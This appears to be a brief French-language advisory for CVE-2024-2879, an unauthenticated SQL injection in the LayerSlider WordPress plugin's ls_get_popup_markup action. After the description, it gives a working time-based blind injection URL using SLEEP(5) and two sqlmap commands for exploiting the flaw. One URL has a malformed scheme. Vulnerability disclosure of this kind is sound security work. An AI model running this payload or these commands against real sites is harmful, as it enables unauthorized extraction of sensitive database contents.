
CVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Injection SQL non authentifiée
LayerSlider 7.9.11 - 7.10.0 - Injection SQL non authentifiée
Le plugin LayerSlider pour WordPress est vulnérable à une injection SQL via l'action ls_get_popup_markup dans les versions 7.9.11 et 7.10.0 en raison d'un échappement insuffisant sur le paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
Temps de réponse avec un délai de 5 secondes

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
ou
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T